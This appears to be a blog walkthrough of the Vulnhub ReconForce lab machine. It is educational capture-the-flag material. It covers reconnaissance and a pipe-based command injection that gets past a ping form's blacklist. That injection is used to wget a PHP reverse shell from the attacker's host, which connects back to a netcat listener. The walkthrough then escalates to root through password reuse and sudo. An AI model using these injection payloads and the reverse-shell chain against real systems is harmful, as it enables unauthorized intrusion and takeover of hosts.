
Vulnhub ReconForce: Detailed Walkthrough

Date: 2022-11-12 10:58:22

ReconForce

Identifying the target host's IP address

─(kali㉿kali)-[~/Vulnhub/ReconForce]
└─$ sudo netdiscover -i eth1
3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                                                                                                                            
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.56.1    0a:00:27:00:00:0a      1      60  Unknown vendor                                                                                                                                                           
 192.168.56.100  08:00:27:12:7e:24      1      60  PCS Systemtechnik GmbH                                                                                                                                                   
 192.168.56.170  08:00:27:d6:e8:de      1      60  PCS Systemtechnik GmbH           

Using the netdiscover tool that ships with Kali Linux, the target host's IP address is identified as 192.168.56.170.

Nmap scan

└─$ sudo nmap -sS -sV -sC -p- 192.168.56.170 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-11 20:34 EST
Nmap scan report for bogon (192.168.56.170)
Host is up (0.00017s latency).
Not shown: 65532 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 2.0.8 or later
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:192.168.56.137
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 2
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open  ssh     OpenSSH 8.0p1 Ubuntu 6build1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 6f:96:94:65:72:80:08:93:23:90:20:bc:76:df:b8:ec (RSA)
|   256 6f:bb:49:1a:a9:b6:e5:00:84:19:a0:e4:2b:c4:57:c4 (ECDSA)
|_  256 ce:3d:94:05:f4:a6:82:c4:7f:3f:ba:37:1d:f6:23:b0 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title:  Recon_Web
|_http-server-header: Apache/2.4.41 (Ubuntu)
MAC Address: 08:00:27:D6:E8:DE (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.95 seconds

The target host has 3 open ports: 21 (FTP), 22 (SSH) and 80 (HTTP).

Get Access

┌──(kali㉿kali)-[~/Vulnhub/ReconForce]
└─$ ftp 192.168.56.170
Connected to 192.168.56.170.
220 "Security@hackNos".
Name (192.168.56.170:kali): anonymous
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -alh
229 Entering Extended Passive Mode (|||35031|)
150 Here comes the directory listing.
drwxr-xr-x    2 0        117          4096 Jan 06  2020 .
drwxr-xr-x    2 0        117          4096 Jan 06  2020 ..
226 Directory send OK.
ftp> ls
229 Entering Extended Passive Mode (|||37248|)
150 Here comes the directory listing.
226 Directory send OK.
ftp> quit
221 Goodbye.

The FTP service does not expose much information.

┌──(kali㉿kali)-[~/Vulnhub/ReconForce]
└─$ searchsploit vsftpd 3.0.3                                  
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                                                                                             |  Path
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
vsftpd 3.0.3 - Remote Denial of Service                                                                                                                                                    | multiple/remote/49719.py
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
                            
──(kali㉿kali)-[~/Vulnhub/ReconForce]
└─$ curl http://192.168.56.170            
<!DOCTYPE HTML>
<html>
<head>
<title> Recon_Web</title>
<link rel="stylesheet" type="text/css" href="css/style.css">

</head>
<body>
<header>
<div class="main">
  <div class="logo">
  <img src="logo.png">
  </div>
<ul>
<li><a href="#">Home</a></li>
<li><a href="https://www.reconforce.in" target="_blank">Service</a></li>
<li><a href="https://www.hacknos.com/os-hacknos-3-walkthrough-vulnhub-ctf/" target="_blank">Blog</a></li>>
</ul>

</div>

<div class="title">
<h1>hackNos</h1></div>

<div class="button">
<a href="5ecure/" class="btn">TroubleShoot</a>>
</div>
    
</header>

</body>

</html>

The returned page contains a link to 5ecure/, but that page is protected by authentication, so it is set aside for now.

┌──(kali㉿kali)-[~/Vulnhub/ReconForce]
└─$ gobuster dir -u http://192.168.56.170 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt 
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.170
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.2.0-dev
[+] Timeout:                 10s
===============================================================
2022/11/11 20:52:22 Starting gobuster in directory enumeration mode
===============================================================
/css                  (Status: 301) [Size: 314] [--> http://192.168.56.170/css/]
/server-status        (Status: 403) [Size: 279]
Progress: 219753 / 220561 (99.63%)===============================================================
2022/11/11 20:53:27 Finished
===============================================================
                                                                                                                                                                                                                                            
┌──(kali㉿kali)-[~/Vulnhub/ReconForce]
└─$ gobuster dir -u http://192.168.56.170 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.sh,.txt
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.170
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.2.0-dev
[+] Extensions:              php,html,sh,txt
[+] Timeout:                 10s
===============================================================
2022/11/11 20:53:40 Starting gobuster in directory enumeration mode
===============================================================
/index.html           (Status: 200) [Size: 660]
/.html                (Status: 403) [Size: 279]
/.php                 (Status: 403) [Size: 279]
/css                  (Status: 301) [Size: 314] [--> http://192.168.56.170/css/]
/.html                (Status: 403) [Size: 279]
/.php                 (Status: 403) [Size: 279]
/server-status        (Status: 403) [Size: 279]
Progress: 1101979 / 1102805 (99.93%)===============================================================
2022/11/11 20:59:19 Finished
===============================================================
                                                                                                                                                                                                                                            
┌──(kali㉿kali)-[~/Vulnhub/ReconForce]
└─$ nikto -h http://192.168.56.170
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.56.170
+ Target Hostname:    192.168.56.170
+ Target Port:        80
+ Start Time:         2022-11-11 20:59:47 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.41 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server may leak inodes via ETags, header found with file /, inode: 294, size: 59bd0f09b74ac, mtime: gzip
+ Allowed HTTP Methods: GET, POST, OPTIONS, HEAD 
+ OSVDB-3268: /css/: Directory indexing found.
+ OSVDB-3092: /css/: This might be interesting...
+ 7915 requests: 0 error(s) and 7 item(s) reported on remote host
+ End Time:           2022-11-11 21:00:41 (GMT-5) (54 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested


      *********************************************************************
      Portions of the server's headers (Apache/2.4.41) are not in
      the Nikto 2.1.6 database or are newer than the known string. Would you like
      to submit this information (*no server specific data*) to CIRT.net
      for a Nikto update (or you may email to [email protected]) (y/n)? n

                                                                                                                                                                                                                                            
┌──(kali㉿kali)-[~/Vulnhub/ReconForce]
└─$ dirb http://192.168.56.170

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Fri Nov 11 21:01:03 2022
URL_BASE: http://192.168.56.170/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.56.170/ ----
==> DIRECTORY: http://192.168.56.170/css/                                                                                                                                                                                                  
+ http://192.168.56.170/index.html (CODE:200|SIZE:660)                                                                                                                                                                                     
+ http://192.168.56.170/server-status (CODE:403|SIZE:279)                                                                                                                                                                                  
                                                                                                                                                                                                                                           
---- Entering directory: http://192.168.56.170/css/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               
-----------------
END_TIME: Fri Nov 11 21:01:06 2022
DOWNLOADED: 4612 - FOUND: 

The directory scans do not seem to turn up anything useful.

┌──(kali㉿kali)-[~/Vulnhub/ReconForce]
└─$ wget http://192.168.56.170/css/2.jpg                                          
--2022-11-11 21:04:11--  http://192.168.56.170/css/2.jpg
Connecting to 192.168.56.170:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 502241 (490K) [image/jpeg]
Saving to: ‘2.jpg’

2.jpg                                                      100%[========================================================================================================================================>] 490.47K  --.-KB/s    in 0.002s  

2022-11-11 21:04:11 (212 MB/s) - ‘2.jpg’ saved [502241/502241]

                                                                                                                                                                                                                                            
┌──(kali㉿kali)-[~/Vulnhub/ReconForce]
└─$ ls
2.jpg  nmap_full_scan
                                                                                                                                                                                                                                            
┌──(kali㉿kali)-[~/Vulnhub/ReconForce]
└─$ steghide extract -sf 2.jpg    
Enter passphrase: 
                                                                                                                                                                                                                                            
┌──(kali㉿kali)-[~/Vulnhub/ReconForce]
└─$ stegseek 2.jpg /usr/share/wordlists/rockyou.txt 
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek

[i] Progress: 99.85% (133.2 MB)           
[!] error: Could not find a valid passphrase.

Referring to other people's write-ups: the author left a hint in the FTP login:

┌──(kali㉿kali)-[~/Vulnhub/ReconForce]
└─$ ftp 192.168.56.170
Connected to 192.168.56.170.
220 "Security@hackNos".
Name (192.168.56.170:kali): anonymous
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> 

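The Security@hackNos string here may be a username or a password. During web reconnaissance only one page requiring authentication was found, so perhaps this is the password for that page (username admin).

The login succeeds, and after logging in there is a Ping_scan feature.

Input 127.0.0.1:

Response: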

PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data.
64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.015 ms
64 bytes from 127.0.0.1: icmp_seq=2 ttl=64 time=0.027 ms
64 bytes from 127.0.0.1: icmp_seq=3 ttl=64 time=0.025 ms
64 bytes from 127.0.0.1: icmp_seq=4 ttl=64 time=0.028 ms

--- 127.0.0.1 ping statistics ---
4 packets transmitted, 4 received, 0% packet loss, time 3052ms
rtt min/avg/max/mdev = 0.015/0.023/0.028/0.005 ms

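The ping command runs successfully, so the next step is to check whether there is a command injection vulnerability.

Input: 127.0.0.1;ls returns no result.

Input: 127.0.0.1&&ls returns no result.

Presumably some filtering mechanism is in place.

However, the pipe character is not filtered.

Input: 127.0.0.1|ls returns successfully: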

css
index.html
logo.png
out.php

Input: 127.0.0.1|cat out.php returns the source code of out.php:

'',
        ';'  => '',
        '| ' => '',
        '-'  => '',
        '$'  => '',
        '('  => '',
        ')'  => '',
        '`'  => '',
        '||' => '',
    );

    // Remove any of the charactars in the array (blacklist).
    $target = str_replace( array_keys( $substitutions ), $substitutions, $target );

    // Determine OS and execute the ping command.
    if( stristr( php_uname( 's' ), 'Windows NT' ) ) {
        // Windows
        $cmd = shell_exec( 'ping  ' . $target );
    }
    else {
        // *nix
        $cmd = shell_exec( 'ping  -c 4 ' . $target );
    }

    // Feedback for the end user
    echo "

{$cmd}

";
}

?>

The code shows that a pipe character followed by a space is also filtered, so several variants have to be tried.
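For comparison, the blacklist above can be set beside an allowlist that accepts only a literal IP address and a ping call that never passes through a shell. This is an added example, not code from the target machine or the original post; the function names blacklist_filter, validated_ip, ping_host and handle_request are hypothetical, and the blacklist reproduces only the entries visible in the listing.

```php
<?php
// Added example: blacklist filtering (as in the listing) beside allowlist validation.
// All function names here are hypothetical.

// The blacklist from the out.php listing. Its first key is cut off on the page,
// so only the entries that are visible are reproduced here.
function blacklist_filter(string $target): string
{
    $substitutions = array(
        ';'  => '',
        '| ' => '',
        '-'  => '',
        '$'  => '',
        '('  => '',
        ')'  => '',
        '`'  => '',
        '||' => '',
    );
    return str_replace(array_keys($substitutions), $substitutions, $target);
}

// Allowlist: the whole input must parse as a single IPv4/IPv6 address.
function validated_ip(string $input): ?string
{
    $ip = filter_var(trim($input), FILTER_VALIDATE_IP);
    return $ip === false ? null : $ip;
}

// Run ping without a shell. With an array command (PHP >= 7.4) proc_open()
// hands each element to the program as one argv entry, so shell
// metacharacters in an argument are never interpreted.
function ping_host(string $ip): string
{
    $spec = [1 => ['pipe', 'w'], 2 => ['pipe', 'w']];
    $proc = proc_open(['ping', '-c', '4', $ip], $spec, $pipes);
    if (!is_resource($proc)) {
        return '';
    }
    $out = stream_get_contents($pipes[1]);
    fclose($pipes[1]);
    fclose($pipes[2]);
    proc_close($proc);
    return $out === false ? '' : $out;
}

// Request handler: validate first, execute second, encode on output.
function handle_request(string $input): string
{
    $ip = validated_ip($input);
    if ($ip === null) {
        return 'Invalid IP address';
    }
    return htmlspecialchars(ping_host($ip), ENT_QUOTES, 'UTF-8');
}

// Inputs taken from the walkthrough, plus the pipe-and-space variant the
// filter does catch. No command is executed in this loop.
$samples = ['127.0.0.1', '127.0.0.1;ls', '127.0.0.1|ls', '127.0.0.1| ls'];
foreach ($samples as $s) {
    printf(
        "%-15s blacklist -> %-15s allowlist -> %s\n",
        $s,
        blacklist_filter($s),
        validated_ip($s) ?? 'rejected'
    );
}
```

The blacklist turns 127.0.0.1;ls into 127.0.0.1ls, which ping cannot resolve, while 127.0.0.1|ls passes through unchanged; the allowlist rejects every sample except the bare address.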

Next, shell.php can be downloaded to the target host and then executed.

┌──(kali㉿kali)-[~/Vulnhub/ReconForce]
└─$ cp ~/Tools/php_reverse_shell/php-reverse-shell-1.0/php-reverse-shell.php .
                                                                                                                                                                                                                                            
┌──(kali㉿kali)-[~/Vulnhub/ReconForce]
└─$ ls
2.jpg  nmap_full_scan  php-reverse-shell.php
                                                                                                                                                                                                                                            
┌──(kali㉿kali)-[~/Vulnhub/ReconForce]
└─$ mv php-reverse-shell.php shell.php
                                                                                                                                                                                                                                            
┌──(kali㉿kali)-[~/Vulnhub/ReconForce]
└─$ vim shell.php 
                                                                                                                                                                                                                                            
┌──(kali㉿kali)-[~/Vulnhub/ReconForce]
└─$ python -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...

Input: 127.0.0.1|wget http://192.168.56.137:8000/shell.php

Input: 127.0.0.1|ls. The result shows that shell.php was downloaded successfully:

css
index.html
logo.png
out.php
shell.php

Then browse to /shell.php while a listener is started locally on Kali Linux:

┌──(kali㉿kali)-[~/Vulnhub/ReconForce]
└─$ sudo nc -nlvp 5555                                         
[sudo] password for kali: 
listening on [any] 5555 ...
connect to [192.168.56.137] from (UNKNOWN) [192.168.56.170] 46396
Linux hacknos 5.3.0-24-generic #26-Ubuntu SMP Thu Nov 14 01:33:18 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
 10:24:35 up 53 min,  0 users,  load average: 0.00, 0.03, 0.63
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ bash -i
bash: cannot set terminal process group (933): Inappropriate ioctl for device
bash: no job control in this shell
www-data@hacknos:/$ 

A shell on the target host is successfully obtained on Kali Linux:

www-data@hacknos:/var/www$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
uuidd:x:106:111::/run/uuidd:/usr/sbin/nologin
tcpdump:x:107:112::/nonexistent:/usr/sbin/nologin
landscape:x:108:114::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:109:1::/var/cache/pollinate:/bin/false
sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
recon:x:1000:119:rahul:/home/recon:/bin/bash
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
ftp:x:111:117:ftp daemon,,,:/srv/ftp:/usr/sbin/nologin
mysql:x:112:118:MySQL Server,,,:/nonexistent:/bin/false
dnsmasq:x:113:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
www-data@hacknos:/var/www$ cd /home
cd /home
www-data@hacknos:/home$ ls -alh
ls -alh
total 12K
drwxr-xr-x  3 root  root   4.0K Jan 10  2020 .
drwxr-xr-x 20 root  root   4.0K Jan  6  2020 ..
drwxr-xr-x  4 recon docker 4.0K Jan 10  2020 recon
www-data@hacknos:/home$ cd recon
cd recon
www-data@hacknos:/home/recon$ ls -alh
ls -alh
total 32K
drwxr-xr-x 4 recon docker 4.0K Jan 10  2020 .
drwxr-xr-x 3 root  root   4.0K Jan 10  2020 ..
-rw------- 1 recon docker    0 Jan 10  2020 .bash_history
-rw-r--r-- 1 recon docker  220 May  5  2019 .bash_logout
-rw-r--r-- 1 recon docker 3.7K May  5  2019 .bashrc
drwx------ 2 recon docker 4.0K Jan  6  2020 .cache
drwx------ 3 recon docker 4.0K Jan  6  2020 .gnupg
-rw-r--r-- 1 recon docker  807 May  5  2019 .profile
-rw-r--r-- 1 recon docker    0 Jan  6  2020 .sudo_as_admin_successful
-rw-r--r-- 1 root  root     87 Jan 10  2020 user.txt
www-data@hacknos:/home/recon$ cat user.txt
cat user.txt
###########################################

MD5HASH: bae11ce4f67af91fa58576c1da2aad4b
www-data@hacknos:/home/recon$ cat .bash_history
cat .bash_history
cat: .bash_history: Permission denied
www-data@hacknos:/home/recon$ 

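Privilege escalation

After combing through the target host's directories and files, it looks like the first step is lateral movement to the recon user, who has sudo privileges. But how? This brings to mind the password used at FTP login: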

www-data@hacknos:/home/recon$ su - recon
su - recon
Password: Security@hackNos
id
uid=1000(recon) gid=119(docker) groups=119(docker),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),115(lxd)
which python
/usr/bin/python
python -c 'import pty;pty.spawn("/bin/bash")'
recon@hacknos:~$ sudo -l
sudo -l
[sudo] password for recon: Security@hackNos

Matching Defaults entries for recon on hacknos:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User recon may run the following commands on hacknos:
    (ALL : ALL) ALL
recon@hacknos:~$ sudo bash
sudo bash
root@hacknos:/home/recon# cd /root
cd /root
root@hacknos:~# ls -alh
ls -alh
total 40K
drwx------  6 root root 4.0K Jan 17  2020 .
drwxr-xr-x 20 root root 4.0K Jan  6  2020 ..
-rw-------  1 root root    0 Jan 10  2020 .bash_history
-rw-r--r--  1 root root 3.1K Aug 27  2019 .bashrc
drwx------  2 root root 4.0K Jan 17  2020 .cache
drwx------  3 root root 4.0K Jan 17  2020 .gnupg
-rw-r--r--  1 root root  148 Aug 27  2019 .profile
-rw-r--r--  1 root root  876 Jan 10  2020 root.txt
drwxr-xr-x  3 root root 4.0K Jan  6  2020 snap
drwx------  2 root root 4.0K Jan  6  2020 .ssh
-rw-------  1 root root  856 Jan 17  2020 .viminfo
root@hacknos:~# cat root.txt
cat root.txt
     $$\          $$$$$$$\                                          
     \$$\         $$  __$$\                                         
$$$$\ \$$\        $$ |  $$ | $$$$$$\   $$$$$$$\  $$$$$$\  $$$$$$$\  
\____| \$$\       $$$$$$$  |$$  __$$\ $$  _____|$$  __$$\ $$  __$$\ 
$$$$\  $$  |      $$  __$$< $$$$$$$$ |$$ /      $$ /  $$ |$$ |  $$ |
\____|$$  /       $$ |  $$ |$$   ____|$$ |      $$ |  $$ |$$ |  $$ |
     $$  /        $$ |  $$ |\$$$$$$$\ \$$$$$$$\ \$$$$$$  |$$ |  $$ |
     \__/         \__|  \__| \_______| \_______| \______/ \__|  \__|
                                                                    
                                                                    
                                                                    

MD5HASH: bae11ce4f67af91fa58576c1da2aad4b

Author: Rahul Gehlaut

WebBlog: www.hackNos.com

Twitter: @rahul_gehlaut
root@hacknos:~# 

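Privilege escalation succeeded!

An important lesson from this machine: unusual information the author left when designing the box, such as the non-standard banner returned by FTP, can be very useful.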

From: https://www.cnblogs.com/jason-huawen/p/16882871.html
